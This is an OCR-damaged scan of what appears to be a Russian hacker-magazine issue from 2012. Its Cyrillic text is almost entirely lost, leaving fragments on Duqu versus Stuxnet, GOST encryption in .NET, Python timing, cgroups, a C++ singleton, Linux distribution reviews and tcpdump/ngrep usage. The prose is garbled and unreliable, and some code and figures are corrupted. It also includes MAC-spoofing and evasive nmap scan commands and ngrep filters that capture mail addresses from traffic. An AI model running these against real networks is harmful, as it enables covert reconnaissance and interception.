36 ,

30 .
11.08.2011,
36

7:50 :01

, 9,

18.08.20 11 , 7:29:07
R-

30 -

10.

DUQU VS STUXNET

R-

Visual ++

ATL

UPX

Stuxnet vs. Duqu

Duqu St uxnet. R-
Stuxnet. Duqu n ,
n <<Stuxne t unde

RpcHandler_ '-

the Mi coscope l.

CeatePocessll;

56-57),

n.

RPC

Rndl_S - (,

n Duqu BinDiff,

);

Rndl_6 - ;

11).

Rndl_7- .

, n

Duqu . RPC :

RpcHandler_1- ;
RpcHandler_2 -

12.

R -

Rndlr_- ;

?

-

Stuxnet

80

: ) ,


<<?>>.
,

. ,

. , Stuxet, Duqu

. ,
Duqu,
,
,
r .
- ,
.
, , ,
.

12.


Duqu . :::


Program: C:\Program Files\Rising\RIS\rsmain.exe


r: lv! BR-ce op
:

1i32/ G h odo N. NA D

r1

ESET

This application has requested the Runtime to terminate it in an unusual way.


Please contact the application's support team for more information.

r
11 . r 1
.

Program: C:\Program Files\Rising\RIS\RsTray.exe


nII

r r1 ,
11
11.

This application has requested the Runtime to terminate it in an unusual way.


Please contact the application's support team for more information.

Preview
UNIXOID
"NRID
gd,
-
,

d id- .
,

firmware.

,
,

,

,
,

, G- . .
-
did-
.

. 1

. 2 .1

8 1.2 81.1

--

. . . .

, ,. , , , .

,,.

.-

-.

Microsoft. -.

. su .

SYN\ACK

11

>> ?
, , ,

SYN\ACK

UNIXOID

01/156/2012

<<

100 .
.
?

FERRUM

-NS'
Petium
ID--su!

, 12

NAS'e .


,
,
. .

087

plaintext [f i stlaplaintext.su, www.plaintext.sul


OCCTEMO.NETFRAMEWORK

Stong name
- n ,


, ,

.NET

F amewo k,

System.Secuity. Cyptogaphi,
,

CL R

.N ET

F amewok

.NET,

SYSTEM .SECURITY.CRYPTOGRAPHI

, ,

System . Secuity.Cyptogaphi,

-
n

[].

- ,

, - . .;

-
, . . ;

htto: Uaacbowse r.
ogsoot .com/ -

GAC

ws.

.509 L-

[XM L Sigatuel.
,
,

bjt.[y/uyxZs5
- ,

28147-89

088

F amewok

.NET

#.

[.

1]. ,


Symmeticlgoithm, -


.N-

AssymeticAigoithm, - HashAigoithm
KeyedHashAigo i thm ,

-.

.NET

-1

, ,
.

28147-89

, ,

~.

SYMMETRICALGORITHM
.NET Famewok

SymmeticAigoithm.

MSDN,

puic

puic

.........._

RSA

DE-DEOES

--

pulic

OSA

AES

RC2

puic

-.._

virtual ICryptoTransform CreateDecryptor();
virtual ICryptoTransform CreateEncryptor();
abstract void GenerateIV();
abstract void GenerateKey();


Framework

,
,

namespace Gost

. ,

ICyptoTansfom .

puic

MSDN

. ,

class GostCfb : SymmetricAlgorithm

ICyptoTansfom

pulic

. :

pulic

byte [] rgbKey,
byte [] rgV

int TransformBlock(byte[] inputBuffer,


int inputOffset, int inputCount,
byte [] outputBuffer, int outputOffset);

){}
puic

byte [] TransformFinalBlock( byte [] inputBuffer,


int inputOffset, int inputCount);

puic

MSDN

, ,

){}
puic

[) .

{}

28147-89

override ICryptoTransform CreateEncryptor

byte [] rgbKey,
byte [] rgV

SymmeticAigoithm, ,

over r ide ICryptoTransform CreateDecryptor()

{}

n
, - .

GostCfb(){}
override ICryptoTransform CreateDecryptor

puic
puic

override ICryptoTransform CreateEncryptor()


override void GenerateiV(){}
override void GenerateKey(){

, . ,

.NET Famewok'y

, ,

[CFB).

,
.

KO,LJ,M 28147-89

private static byte[] GetRandomBytes(int bytesCount)
private static void Gamm(byte[] input,
    byte[] gamma, byte[] output)

, 28147-89

[ )
,

.NET Famewok'a CFB.


GostCfb,

.NET

FRAMEWORK'Y ,
,

CFB (r )


(CFB)
089

Gost"

010

- << >>,
. <<>>

[ , ] ,

....

'""'"""''

[ , ] .
, .


010 [object

identificato],

010

[,

XOR . ,

] ,

, .

GetRadomBytes

GeeateiV Gt:

lacs], :

010

IVValue

KeyValue,

"{joint-iso-itu-t(2) ds(5) attributeType(4) distinguishedName(49)}"

. , ,

64 256 .

"2.5.4.49"
public GostCfb()
{
    LegalBlockSizesValue = new[] { new KeySizes(64, 64, 0) };
    LegalKeySizesValue = new[] { new KeySizes(256, 256, 0) };
    BlockSizeValue = 64;
    KeySizeValue = 256;
}

]. ASN.1 ,
,
-
.

www. o i d- ifo . c om .

ASN .1- - -

tnt

tt, GostCfb

, ICyptoTansfom.

ASN .1
ITU-T, ,

private sealed class GostCfbTransformEncr : ICryptoTransform
{}
private sealed class GostCfbTransformDecr : ICryptoTransform
{}

KACCGOSTCFBTRANSFORMENCR
tnt
-

, ,

, CFB,

. GostCfb.

, << ,

21 , ].

, .

!] ,
.

OID

11

private byte [] m_Key;

11

11

private byte [] m_State;

11

private byte [] tmpState;


public int TransformBlock( ... )

.N-

r~at~ ();

byte[] plainBlock = new byte[8];
int result = 0;
while (inputCount > 0)
{
    Array.Copy(inputBuffer, inputOffset, plainBlock, 0, 8);
    Gost28147.Gost28147Ecb(m_State, tmpState, m_Key);
    Gamm(plainBlock, tmpState, m_State);
    Array.Copy(m_State, 0, outputBuffer, outputOffset, 8);
    inputCount -= 8;
    inputOffset += 8;
    outputOffset += 8;
    result += 8;
}

CLR

28147-89.

return result;

16

16 ! . , ,
HashAigoithm, , ,

. ,

KeyedHashAigoithm :

XOR.

, ,


28147-89 Gostlmito.
Ke yVal ue
Ha shVa lueSize 32,
32 .

TansfomFinaiBiock
TansfomBiock , n n .

,
,

HashCoe

- ,

GostCfbTansfomDec

GostCfbTansfomEncr,

lnt enai Tansfoml .

CFB,

, ,

[ ,

!.

, :

DWORD,

16-

KEYEDHASHALGORIH
KeyedHashAigoithm .
HashAigoithm ,
:

protected abstract void HashCore(
    byte[] array, int ibStart, int cbSize);
protected abstract byte[] HashFinal();


DWORD,

n 16-

[En c yptBiock161,
.

DWORD

, -,

[XOR DWORD
, XOR !,
, .


uint tempInH = Gost28147.Bytes2Dword(array,
    (int)(ibStart + i * 8));
uint tempInL = Gost28147.Bytes2Dword(array,
    (int)(ibStart + i * 8 + 4));
uint tempOutH = 0;
uint tempOutL = 0;
Gost28147.EncryptBlock16(ref tempInH, ref tempInL,
    ref tempOutH, ref tempOutL,
    Gost28147.P, KeyValue);
ulmito = tempOutH;

HashFinal

.
vl .O

,,,

F amewok

.NET

GAC.

GAC
.NET,
GAC, Global Assemy Cache [

091

! .

GAC

oidMa p

oid Ent y.

. ,
, st ong

name,

, .
,

sn .exe,

.NET

<cryptographySettings>
<cryptoNameMapping>
<cryptoClasses>
<cryptoClass GOSTCFB="Gost.GostCfb, GostAlgs,

F amewok. :

Version=1.0.0.0,Culture=ru,PublicKeyToken=9be88f4818daa492" />

sn.exe -k keypair.snk

Version=1.0.0.0,Culture=ru,PublicKeyToken=9be88f4818daa492" />

<cryptoClass


keypai.sk.
Sig nig

Sig n the asse m y

31. .

gacutil,

GAC

[.
, .

.NET Fame wo k .
.NET,
GAC .

gacutil / i

<

>

Pu ic k, Cultue

GAC l,
GAC ws [. 41.

GOSIMIQ; "Gost.Gostimito,

GostAlgs,

</cryptoClasses>
<nameEntry name="GostImitoAlg" class="GOSTIMITO" />
<nameEntry name="GostCfbAlg" class="GOSTCFB" />
<nameEntry
name="System.Security.Cryptography.KeyedHashAlgorithm"
class="GOSTIMITO" />
<nameEntry
name="System.Security.Cryptography.SymmetricAlgorithm"
class="GOSTCFB" />
</cryptoNameMapping>
<oidMap>
<oidEntry OID="1.2.43.2.2.21" name="GostCfbAlg" />
<oidEntry OID="1.2.43.2.2.22" name="GostImitoAlg" />
</oidMap>
</cryptographySettings>

Wind ows,

.NET

GostCfbAig
Gost lm ito.

GOSTC FB

GOSTIMITO,
GostCfb, GostlmitoAig

.
machine.cofig,

XM L


cyp togaph ySet ting s,
mscolib.

Name Mapping.

<nameEntry
name="System.Security.Cryptography.KeyedHashAlgorithm"
class="GOSTIMITO" />
<nameEntry
name="System.Security.Cryptography.SymmetricAlgorithm"
class="GOSTCFB" />

:
n cy ptoCia ss,

nameEnty. , ,

l.

010

KeyedHashAlgoithm

GostCfb,

Gostlmito

GostCfbAig

i mito

( KeyedHashAlgoithm )

toConfi

. CeatefomName ( "GostimitoA~.

new

'ect l

[ "i$ CryptoConfig System.Security.Cryptography.CryptoConfig

= new t
i mitoSt = new

CyptoSteam n

CyptoSteam

- -

SymmeticAigoithm.

51.

while (rdlen < totallen)


{
t

{key});



CryptoConfig


.N -

28147-89
28147-89

,
. ,

:
232

11

XOR,

[8 ! 4
mod 2321,

. [

[SBoxl,

.
31- ,

32

28147-89,

8 .

.

.

7.

KeyedHashAigoithm.Ceate,
.

CyptoCofig.CeateFomName,
Activato.Ceatelstace

catch.


ull .

oidMap

010

29

, CyptoCofig

010

. ,

MSON

, oidEty

[ , , GostCfI,
- ,

mt,

010

, - ,
,
machie.cofig .

010

ivt

machieOidHT, - -pivate

machieNameHT CyptoCofig !. 61.

28147-89

CLR

MONO PROJECT

- ,

CyptoSteam,

Steam.

. , ,

Mono,

GAC,

$ gacutil -i

< >

, ,

CyptoSteam ,

- :

- CyptoSteam .

$ gacutil -l

.
-
.

machie.config [ Ubutul /t/m/<


>/.

CyptoSteam
,

. ,

Positio - CyptoSteam.

- - . ::::


.NET Famewok,

093

li v inside . og s p o t .c oml


.
- , :
.

, .

1100- xl 1 .
, ylxl = + 1100- xl 1.

, .

. ,

- , !

;1.
, , = 10,

50

50

19.

, !.

. ,

.. .

, .

. ,

09-'


,
, , '
,
.

, : lkl + llkl- 11 + .. . +
llkl- k + 11, k - , -
. ., ,
:

12 lkl- k + 11* k 12. lkl = 100 1 k + k 12- 1/2,


. :! , ,

200, , 14,

    tokens = [0 for i in xrange(len(tokensdict))]
    for key in tokensdict:
        tokens[tokensdict[key]] = key

t = timeit.Timer(setup='from __main__ import func1',
                 stmt='func1()')
print t.timeit(number=1)
t = timeit.Timer(setup='from __main__ import func2',
                 stmt='func2()')
print t.timeit(number=1)

.
:

$ python2 test.py
:

6.889592934

.ss8578

tokens = []
for token in tokeniter:
    if token not in tokens:
        tokens.append(token)

600 .

Olnl,
.

tokesite- ,
, .

Oilog nl .
.

tokesite.


n ?

Linux.

if token not in

tokes: >>, -

Ol * ml, 1 < m < n.

cpulimit,
SIGSTOP SIGCONT:

, n
. ,

# cpulimit --pid=<pid> --limit=<value>

- , .

value ,

import random
import timeit

pid.

CPU, ,
4 -

#
#
f

99999

, 100%, 400 %.
cgoups ,
.

[]

for i in xrange( 1, 2 ):
f.append(random.randrange( 1,

1 ))

...

cgoups :

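# Deduplicate with a list: every membership test scans the whole list
def func1():
    tokens = []
    for token in f:
        if token not in tokens:
            tokens.append(token)

# Deduplicate with a dict that maps each token to the index of its first appearance
def func2():
    tokensdict = {}
    i = 0
    for token in f:
        if not tokensdict.has_key(token):
            tokensdict[token] = i
            i += 1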

ft


$ yaourt -S libcgroup

________________________

095

,
:

group default {
    perm {
        task {
            uid = root;
            gid = root;
        }
        admin {
            uid = root;
            gid = root;
        }
    }
    cpu {
        cpu.shares = 10;
    }
}

, - .

: al , l

, .

! !.
,

group daemons/tomcat {
    perm {
        task {
            uid = root;
            gid = root;
        }
        admin {
            uid = root;
            gid = root;
        }
    }
    cpu {
        cpu.shares = 40;
    }
}

Python.

, URL !
URLI, N
.

N,

1.

theadig ,

let, gevent, Twisted

event-

group daemons/postgres {
    perm {
        task {
            uid = root;
            gid = root;
        }
        admin {
            uid = root;
            gid = root;
        }
    }
    cpu {
        cpu.shares = 50;
    }
}

. , ,
.

filteed , .
:
;

mount {
    cpu = /mnt/cgroups/cpu;
    cpuacct = /mnt/cgroups/cpu;
}

!
, !.

: daemos/tomcat- 40

n :

postges-

%, daemos/
50 %, default -10% .

IP- - ! ,

. /etc/cgules . cof:

/, !:

# <user>       <controllers>   <destination>
*:tomcat       cpu             daemons/tomcat/
*:postgres     cpu             daemons/postgres/
*              cpu             default/

# ifconfig eth0 192.168.1.123


# ifconfig ethe hw ether :1:2::4:s
, ,+

tomcat daemons/
tomcat , postges- daemos/postges ,

- n default.

, .

nmap, :
--max-rate 50-
50 /;

# nmap -sS -Pn -n -iL active-hosts


. ,

-f- ;
-g88- ;
--data-legth

50- 50

/ filteed.
?

/. :::


deeonis (deeonis@gmail.com)

Sigleto. , ,-
- .
, -

Windows,

use

mode

- ,
. ,

, ini-
. , ,
,

Save,

. , ,

-
,
-


, ,
,

?
,
.
.
.


, ,-
,

gSettings,

. CSettigs .
, ,
, .
.

.
,

, Sigleto.
,

, .

098

class CSettings
{
public:
    void getSettings() { ... };
    // ...
};

CSettings gSettings;


CSettings gSettings. , , ,

_, .... ..;.

, n n n

. ,

...... .._..........,

, , gSeetings

. . . . . .. . -(1

01

n . -,
n

CSingleton;

gSettings, ,

class CSettings
{
private:
    CSettings();
    static CSettings* m_instance;

public:
    static CSettings* getInstance()
    {
        if (m_instance == 0)
            m_instance = new CSettings();
        return m_instance;
    }

    void getSettings() { ... };
    // ...
};

class CSettings
{
public:
    static void getSettings() { ... };
    // ...
};

CSettings* CSettings::m_instance = 0;

CSettings

CSettings::getInstance()->getSettings();
CSettings::getSettings();
, , CSettings
n

, , .

, new.

- -

, , . ,
.

getlnstance[].
CSettings
m_i nstance, ,

n - .

, ,

. , 100 % - ,

ini-. ,

, , -

n ,

CSettings , CSettings

, n

n .

n, ,

] .

n <<>> . ,

. n

, <<

. ,

>> . .

, n .

CSingleto,

, ++

,
. , pivate ,

getlstance[], .
,

, . n

[ ,

], , -

01 / 156/ 201 2

099

getlnstance


CSingleton
template <class T>
class CSingleton
{
public:
    virtual ~CSingleton() {};

    static T* getInstance()
    {
        if (m_instance == 0)
            m_instance = new T();
        return m_instance;
    }

protected:
    CSingleton() {};
    static T* m_instance;
};

// CSettings
class CSettings : public CSingleton<CSettings>

getlnstance.

CSettings. ,

n ,

NQ 1
m_instance

, ,

CSettings , .
NQ 2, getlnstance,
, , m_instance.
NQ1, ,
CSettings ,
m_instance.

{
private:
    CSettings();
protected:
    friend class CSingleton<CSettings>;
public:
    static void getSettings() { ... };
    // ...
};

n.
, , ,
.

, . ++
n ,

getlnstance

CSingleton

n . -

I- .

Windows

CSingleton,

, :

, , ,

CSettings

n-n n,

n n

n, ++ fiend,

template <class T>
class CSingleton
{
public:
    virtual ~CSingleton() {};

    static T* getInstance()
    {
        // Serialize creation so two threads cannot both see a null m_instance
        EnterCriticalSection( ... );
        if (m_instance == 0)
            m_instance = new T();
        LeaveCriticalSection( ... );
        return m_instance;
    }

protected:
    CSingleton() {};
    static T* m_instance;
};
,

CSettings,

toa

, .


<< >>
. , , ,
, .

100

, -. ::


UNIXOID

ginde lg i nd e ratu x.i n . u al


LINUX


,

Sabayon n

Sabayon emege

> ,

.config Calculate
Linux
1560 ,
- 866,
Sabayon
- 2625 1250

equo,


Calculate
Linux

ntoo,

, ,
:
.
,

( US

l, , >>
.

Sabayon 7

: s.g
:

GPL

Linux Mint

i686,

86_64

: l tel P etium

11, 512 RAM, 6


Gl ibc 2.13, Udev 171, . g 1.10.4, GNOM E 3.2, 4.7,
L ib e O ffice.O g 3.4.3
13 . 0 ,

S - Getoo ,

D istowat c h.co m .

PCLinuxOS


Faio E c u li ani . ,


64.

no , Mageia

Mandiva .

Gentoo

, .

Gentoo.
5.4

Seve B as e ~ :, .

102

01/ 156/20 12

>> ,

Sabayon


, .
,

6 /etc/make.cof

. ,
, ,
.

make.conf

Liv-

. (
]. Anaconda,

. ,
. , ,
,

.
, ,

man].
Sabayon

, ,

Sabayon n Entopy Stoe

. ,
wid-,

4:3

SpinBase:
GNOME;
: XFce, LXOE, Enlightenmet SpinBase/
OpeVZ ( OpenVZ].
: ,

GNOME

, t

.
.
,

SpinBase

ATI NVidia]

. :

(Fiuxbox] . 4.1
Molecule.
DAILY .

. . ,

, Calculate Linux ( Calculate

( isohybid] .

Gentoo,

Potage,
. ,

Sabayon

. .cofig

866,

Sabayon

Sabayon

2625

1560 ,
1250

].
,

/etc/skel

Entopy. , , ,

Getoo ,
.

equo:

,
,

Gentoo

CL.

mc

# equo install

14 ],

equo , , ,
apt-get: ,

, ,

smt- ( ],
.

Magneto
Stoe eqL!O ( Magneto]. Stoe

DISTROWATCH.COM
06.11.2011]

( ;. ] ,
: i .

(U S -, " , . .] ,
r
Potage. : emege ,

equo ! Package Setting],

- . ,
,

equo

.
, , ,

Sabayon

01 / 156/2012

Ca lculate Linu x (

 1. Mint         2155
 2. Ubuntu       2108
 3. Fedora       1686
 4. Debian       1318
 5. openSUSE     1290
 6. Arch         1222
 7. PCLinuxOS    1032
 8. CentOS        916
 9. Puppy         866
10. Mandriva      708
11. Mageia        627
12. Lubuntu       612
13. Scientific    575
14. Zorin         563
15. Slackware     563
16. Chakra        563
17. Sabayon       557
18. FreeBSD       490
19. Bodhi         478
20. Gentoo        453

],

103

UNIXOID

Calculate Linux 11.9

: calculate- lin ux. u


: GPL

REDHAT/FEDORA SLACKWARE

: i686, 86_64

: lntel Pentium 11 , 128[XFce) 512[)

RAM, 4-6

, RedHat/ F edoa Slackwae,

Kenel3.0.4, Glibc 2.23.4, Udev 164, .g 1.10.4, GNOME 2.32.1,


4.7.1, Lib e Office.Og 3.3 .4

. ,

n n

, .

Linux

CetOS , , ,

RedHat

: ICDS- Diectoy

F e doa

Sv) - [C LO) -

, ,

<< .

, >> ILDAP, mail, ftp,

Fusion Lin ux [ fusionlinux.og ). Fuduntu

j, , . .) . ,

[ f u duntu.o g ] Ubuntu,

. ,

F e doa.

Xange Linux [openxange.com ] - n-

: GNOME ICLDG), XFce ICLDX), [Calculate

, .

Media t, ), CLS ICalculate Linux


Scatch) CSS ICalculate Scatch Sv ) .

RedHat [ , CentOS]
Yellow Dog Linux [yel lowdog linux.com ]. ,

, ,

w S.

( .

. , >>

Vectolinux [w ww.

Gentoo, IR-

vecto linux.com ], ;

Gentoo Foudation . [Anthon y G. Basile)

Zenwalk [ zenwalk.og ] ,

hadened/seliux-epc.
100% Gentoo [ - Gentoo)

DeepStyle [ deepsty l e.o g.ua ] Agilialinux [

MOPSLinux, agil i alinux.u ].

, CL n .
n

Calculate 2[
) . , n cl-install,

1/va/li/Iayman/calculate/pofiles/patches ) , , ,

, , ,

, n

n n

Gub .

n- ,

n , n n

n. n

n Gpated c/fdisk. LVM

/va/calculate/linux cl - instal l.
Cho mium 05 , , .

soft RAID / t-. n


IR C , n
. , .
RAM,
, . ,
initamfs udev, ,

, n Sabayon.

11.0 , ,

Sabayon,
n, ,

~.~ ~

n [ ) . CL

equo,

lot~l

Oioltlof.
J~IIc:

~coeollnoRc:

emege,
, , << vs >>.

, n n

[ ).

u:I'01
n S.:

eselect profile list

Proyctpltp:

j tpO.renon.ntt

NPctpltp:

[ *>>) .

eselect profil e set 1

cl-instlll

-disk/dtY/sdo~2:/:et4

--set

os_insto~ll_ll_dto_drvfglrx

Gentoo. CL
- n, , US- .
n uild-

Calculate Linux n n

01/156/2012

50% ] .

2.32.

'Jo411WHIIHn!r.~
'J fl!.}(i~lf ~I t JI

XFce, Fluxbox

: V - [

1<>.

!Jfln<J~r

, ], - - [ ].

n
nolll)'kr. ...poelfiT~

], .

\1
-~ ..

-,
~~~.:'

n.I

JJU: ......, .

'71
1\f~~...

~;r.:.~~

Windows

,':~.~~

~~~~~

~~==

"
~~t

,:::.

~'::.:

Zorin OS 5.1

: zo i n-os.com
HI)'IIM

nporpi!MI'I~t-

0~::.-:.::

&:'=.':.

6SIN~C-~

GPL

i386, 86_64
lntel Pentium 11 ,512 RAM, 6
Kenel2.6.38, Glibc 2.13, Udev 167, .g 1.10.1 , GNO ME 2.32 .2,
L ibeOffice.O g 3.3 .3.1

0 Ntnu gl !

1~'*1

Liu x Mi t

Ubuntu

Ubuntu,

Windows.
[ GnoMenu, , ,
] Wi n7.

UBUNTU

, .

, . ,

Nautilus-Eiementay

Gloobus Pe v iew,

Apple Quicklook.


, Softwae Cente .

Linux Mint 11 "Katya"

Zoin

linuxmint .com
: GPL
: i386, 86_64
: lntel Pentium 11, 512 RAM, 4
Kenel2 . 6.38 - 8, Glibc 2.13, Udev 167, .g 1.10.1, GNOME 2.32 .1,
LibeOffice.Og 3.3 .2
n Ubu ntu, ,
, Linux. n [

05 Look

Cha n ge

,
,

Win7, WinXP

Ubuntu.

-lntenet ws Manage - n

- [ Chome].

PlayOnlinux

ZOS

Wine
Windowsn Ubu ntu.

Wineticks, n n

npopa .

, - [

] n Oistowatch.com,

n],

-n n. >>

Multimedia, Gaming] .
Ubuntu, LS- [3.1].

Clement

Lefebve.

n - n ,

Lite [ LXO E] Educational


[Uitimate, Business,

[n n ].
n Windows-ce.
n ,

Ubuntu,

100 %.

, ,

Ubu ntu,

. n
, . , n ,

mintMenu, n mint lnstall


mintUpdate . mintlnstal l

n : >>.
, , ,

Ubuntu

Softwa e Cente,

n , .
, -

[c ommun i ty . linuxmint.com/softwae ].

mintUpdate

: , n

, << >>.

Ubuntu,

L S -

LMOE, Oebian
Gnome XFce Rollig
elease. LMOE [201109].
GNOM E [

01 /156/2012

Zor i

05

Win7

105

UNIXOID
n

Localization Manage laddlocalel: n

n , , .
n,

. n, n

PCLinuxOS Magazine,
CAEiinux, TinyMe ZEN-minil.

IKaoshi,

Mageia 1

: mageia.og/u/
:

Po~sh
Port~se(t;1lfl

Portuquese

GPL

i586, 86_64
lntel Pentium 11, 512 RAM, 6
Kenel3.0.4, Glibc 2.12.1, Udev 173, . g 1.10.4, GNOME 2.32 .1,
4.7.4, L ibeOffice.Og 3.4.3

( Portug~11

PunjaI

Romanlan
Russi

, -

2010.

Mandiva, .
,

PCLinuxOS

Mandiva, ,

addlocale

MANDRIVA

, Mandiva

, , n
, , . ,

Mageia

PCLinuxOS

2011 Desktop

pclinuxos.com
GPL
: i586
: lntel Pentium 11, 512 RAM, 3
Kenel2.6.38.8, Glibc 2.11.2, Udev 168, . g 1.10.4, GNOME 2.32.1,
4.6.4
:

161

20

. -, 32-

GNOME.

IEuopa

150,

21. V-
32-,

64- . .

Mageia n Mandiva .
Mageia Li ve ,
. ,

2003 Mandake
! Mandival. Radically Simple .

n :

, ,

>> .

, Liv-.

. n

Cente, Mandiva . n

2007 PCLinuxOS

Mandiva .

Mageia

Contol

Rpmdake.

-, IXFce, LXOE, OpenBox GNOMEI

Mandiva

. n

, mageia.og/en/1/migate . :::t:

Full Monty Oesktop OVO, . Rolling


elease, n RPM-based.
PCLOS , n 64 - CPU.

Mageia 1.

-,
n n.
n , LibeOffice
.

URPM

PCLinuxOS

, n n

Synaptic.

n n , n

k, n n : , .
n , n-

ZOS
WINE

PLAYONLINUX
106

WINETRICKS

Mageia Mandriva,

01 /156/2012

le xec it . rul

TCPDUMP
UNI-

.
,

tcpdump.

Linux

SD- , ,

I:I:J:Itl:ll!lli

tcpdump-

, ,
.
,

tcpdump

25

UNJX.

UNJ-

Windows

li bpcap,

tcpdump.

tc pdump,

,
.

107

UNIXOID

[raot~hast
tcpdu~:

x_unixoid_ tcpdUfl'4']t; sudo tcpdUI!fl -i

vebose

ou tput

s up pess ed ,

use -v

- vv

~.&.~la n B -
f

lB -n host 192 . 168 .8 . 1 and port 53

fu l l

decode

potocol

1ist ening ~o~lanB , lt nk - type EH1BI13 ( Ethernet J, capture slze 65535 bytes
16 :22 :41 .348 185 IP 1 92. 1 68 . .1 1 . 418 > 192 . 168 .8 . 1.53 : 49244+ ? . u . ( 23J
16 :22 :41 .345182 IP 192.168 .8.1 .53 > 192 . 168. . 11.461 : 49244 /2/3 213.188 .284 .3, 77.88.21.
3, 87 . 258 .258.3 , 87 . 258.258.283 , 87.258 . 251.3 , 93.158.1 34.3 , 93 . 15.134.2 , 213.188.

193.3 !254 )
16 :22 :41 .345381 IP

> 192.1 68 .8.1 .53 :

192 .16 8 . . .7336

16 :22 :41 .352162 IP 192. 168 .8.1 .53

>

192.168. . 11 .376:

63342+

ya .ru . !23)

63342 812/3

213.188.193 .3 ,

213 . 188.2

84 .3, 77 .88.21.3, 87 .258.258.3, 87.258.258 .283 , 87.258.251.3. 93.158.134 . 3, 93 . 158 . 13


4.283 (254)
16 :22 :41 .599428 IP 1 92.16 8 . .1 1 . 37935 > 192 . 168 .8.1.53 : 43368+ R'? ~ . tns-counte . u . (36 J
16 :22 :41 .684278 IP 192.168 .8.181 . 48944 > 192 . 168 .8.1.53 : 4465+ '? yandex .st . 127)
16 :22 :41 .684422 IP 192 . 168.8.1.53 > 192.168.8..7935 : 43368 5/212 R 217 .73.288 . 219 , 2 17.73. 2
8 .228, 217 . 73.28 .2 21 , 217.73.28 . 222, R 2 17.73.288.218 1193)
16 :22 :4 1.684742 IP 192.168.8.18 1 .58447 > 192.168 .8.1.53 : 23622+ R? ~J.oR&J . tns -counte . u . 136)
16 :22 : 4 1 . 68116 IP 192.168.8.HI1.5561 4 > 192.168 .8 .1.53 : 14996+ ? mc . yandex .r-u . {38 )
16 :22 :4 1.611178 IP 192.168 .0.1 .53 > 192 . 168.8 . 181 . 48944 : 4465 5/2/3 213.188 . 193 . 215 , 213.18
.284 . 2 15, 77 .88 .2 1.2 15 ,
18 packets capt ued

87 .258.258 . 215 ,

11 packets ecei ve d fl lt e
packets dropped kenel
[ r- oot@~host x_unixold_tcpdumpHI

DNS -anpoc

tcpdump ,

, UDP, ICMP, SMB/CIFS, NFS, AFS, AppleTalk. tcpdump


?
. :

Flags [.], seq 3666073194:3666074622, ack 3281095139,


win 2, options [, , 5 val 70228462 ecr 1681724],
length 1428

93 . 158. 134 . 215 1213)

- , tcpdump

[ !:

flags - .
5 (SYN), F (FIN), (PUSH)

tcpdump

R (RST),

> s udo

tcpdump - i wlanB - 2 -n -v host 192 . 168 .e . l and port 53


tcpdump : 1istenl ng on wlanB , 1in k-t ype EtBtf3 < Ethe netJ, capt ue size 65535 bytes
16 :49 :22 . 218552 IP <tos , ttl 64 , id 8339, offset , flags FJ , t UDP <17 ), leng th 51 )

192 . 168 . . 18 1 .5387 9 > 192 . 168.8 . 1.53: 52+ ? . u . <2J


16 :49:22.224219 IP ltos 8 , t tl 64 , id , offset , flags CDFJ , proto UDP ( 17), length 282)
192 . 168 .8 . 1.53 > 1 92. 1 68. . 11 .5 79: 52 8/213 ya .ru . 87.25.25 . 283, .u . 87.25.251.
3, .u. 93 . 158.134 .3, .u. 93.158.134 .283, .u. 213.188.193.3 , . u. 213.188 . 284.3
, . u . 77 .88.21.3 , .u. 87 . 258 . 25 . 3 (254 )

2 packe t s
2 packets

captued
ece i ve d fllte

~ ~ackets dopped kenel

DNS-anpoc

data-seqno - n ,
first:last, first last-

n
n

nbytes.

ack - (ISN + 1).


window- .
options - ,
n cmss 1024> ( ).
lenght - .

, tcpdump

, ' -':

t [ , tcpd ump
! ,
:

# tcpdump -i wlane

-n

# tcpdump -i wlane - 1 -n - \
host 192.168.0.1 and port 80

, , .

-' I - DNS-.

,
:

,
, .

# tcpdump -i wlane
d port 53

- 1

-n host 192.168.0.1 \

, tcpdump, ,

-v'. IP

I- :

(tos , ttl 64, id 8339, offset , flags [DF],


proto UDP (17), length 51)

DNS-apoc tcpdump.

, DNS-apoc [ 531 192.1 68.0.101

192.168.0.1 . ?
16:22:41.340105-

- , .

[TOSI , [ LI ,
,

[ facl.

, , [,

UDP, ICMP) .

IP, ,

. , ,

. tcpdump

tcpdump, .

, host t,

, ,

tcpdump DNS- -

, ?

49244+ ? ya.ru. (231 , ,

?>>, .u,

/I- 23

# tcpdump -i wlan0 -n src 192.168.0.1

. - .
,

dst,

. ,

d:

[8/2/31 [

213.180.204.3, 77.88 21.3, 87 250 250.3 .. 1.

108

# tcpdump -i wlan0 port not 22 and port not 53

01 /156/2012

GREP

tcp dum p

TCPDUMP
tcp dump:

i []- ,
.

g,

, .
, ,

POST

GE T

-,

n- I - DN S- .
nn- 1 - .

- th t- .

# g re p

- 1 -q - d eth e
t cp and port se

" G

J s

v, -vv, -vvv -

" \

!, , ! .

[n] -

s[n] - , !

ngrep - i 'game* Jpe rn] adult'


- d ethe > s la cke r s. t xt

-w

!.

byl i ne \

5- -
! sequece u mbes l.

- t h t- .
q- ! ! .

S - :

# ngrep -i 'rcpt to|mail from' tcp port smtp

- I s - .

, SS

DN S - . ! ! exce pt lel.

SY N ! - ] ,
:

, tc pdum p :

#
#

tc pdump - i wlane

- 1

tcpdump 'tcp[13] == 2'

- n port r ange 21- 23


? . -

. SY N .

tcpdump -i wlane

-n > 32 and <; 128

, . ,
:

#
#

t cpdump - i wlane 1 -n s rc net 192.16S.e. e/16 \


and dst net 1e.e.e.e; s or 172 . 1 . . / 1

tcpdump 'tcp[tcpflags] & tcp-syn != 0'


tcpdum p :

tc pd ump -

/ I .

tcpdump,

: p oto[exp:size], t - , -

, size- ,

! 1
] . , -

1 ,

tc pdump

- ,

nm ap. , nm ap

192.168.0.100

15 : 49 :38 . 719422 IP 192.168 . . 1 . 596 24 > 19 2. 168 . . 111 . 8888: Flags [5 ], seq 1 36557188, win 32792 , options [mss 1
+6396.sackOK.T5 val 94976812 e.nop . wscale 5], length
15 : 49 :38 .719425 IP 192.168. . 111.8888 > 192. 168 . . 1.5962 4: Flags [R.J. seq . ack 136557189, win , length
15 : 49 :38 .719435 IP 192.168. . 1 . 54946 > 192.168 . 0.111.587 : Flags [5], s eq 2921975 2 1. win 32792 . options [mss 16
+396,sackOK,T5 val 9497681 2 e.nop . wsca le 5J, length
15 : 49 :38 .719438 IP 192.168 . . 111 . 587 > 192 . 168 . 0 . 1 . 54946 : Flags [R.J . s eq . ack 2 9219752 2 . win . length 0
15 : 49 :38.719449 IP 192 . 168.0.100 . 43337 > 192. 168 . 0.111. 22 : Flags [5 ], seq 2610 24 277 . win 32792 . options [mss 163
+96 , sackOK.T5 val 94976812 0,nop,wscale 5J, length
